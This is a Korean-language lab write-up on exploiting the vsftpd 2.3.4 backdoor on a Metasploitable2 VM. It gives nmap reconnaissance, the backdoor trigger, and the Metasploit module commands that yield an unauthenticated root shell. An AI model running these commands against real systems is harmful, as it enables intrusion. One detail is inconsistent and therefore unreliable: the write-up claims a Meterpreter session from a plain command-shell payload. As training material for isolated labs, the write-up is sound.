
Metasploitable2에서 vsftpd 2.3.4 백도어(CVE-2011-2523) 악용 — 정찰, 악용, 그리고 조치를 다루는 실습형 침투 테스트 랩 작성글.
vsftpd 2.3.4의 알려진 백도어 취약점을 발견하고 악용하는 실습형 랩으로, 격리된 Kali Linux ↔ Metasploitable2 환경을 사용합니다.
의도적으로 취약하게 구성된 대상 머신을 상대로 침투 테스트 핵심 워크플로(정보 수집, 취약점 식별, 악용, 악용 후 검증)를 연습합니다.
| 구성 요소 | 세부 정보 |
|---|---|
| 공격자 | Kali Linux 2026.1 (VMware) |
| 대상 | Metasploitable2 (VMware) |
| 네트워크 | NAT, 호스트/인터넷에서 격리됨 |
| 대상 IP | 192.168.233.129 |
두 VM 모두 실제 네트워크에서 격리된 동일한 사설 네트워크 세그먼트에 유지하여, 실습이 외부에 노출되지 않도록 했습니다.
nmap -sV -sC 192.168.233.129
대상의 열린 포트와 서비스 버전을 스캔했습니다. 결과는 다음과 같습니다:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
...

포트 21에서 vsftpd 2.3.4가 실행 중이었습니다. 이 특정 버전은 백도어를 포함하는 것으로 공개적으로 알려져 있습니다: 2011년, 공식 vsftpd 소스 아카이브가 손상되어 악성 코드가 삽입되었습니다. :) 문자열이 포함된 사용자 이름으로 로그인하면 TCP 포트 6200에 숨겨진 리스너가 트리거되어 인증 없이 원격 셸을 얻을 수 있습니다.
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run
악용 코드가 백도어를 성공적으로 트리거하여 Meterpreter 세션을 반환했습니다.

sessions -i 1
sysinfo
getuid
손상된 호스트에서 활성 세션과 접근 권한 수준을 확인했습니다.


인증 없이, 오래되고 백도어가 삽입된 단일 서비스를 악용하여 대상 머신에 대한 완전한 root 권한 원격 셸 접근을 획득했습니다.
알려진 공개 취약점이 있는 단일 오래된 서비스만으로도 시스템 전체를 손상시키기에 충분했습니다 — 맞춤형 악용 코드 개발이나 고급 기술이 필요 없었습니다. 이는 패치 관리와 버전 위생이 실제 보안 태세의 기초가 되는 이유를 보여줍니다.
이 실습은 보안 교육용으로 설계된 의도적으로 취약한 가상 머신인 Metasploitable2만을 대상으로, 운영 시스템이나 제3자 인프라와 연결되지 않은 격리된 랩 네트워크에서만 수행되었습니다.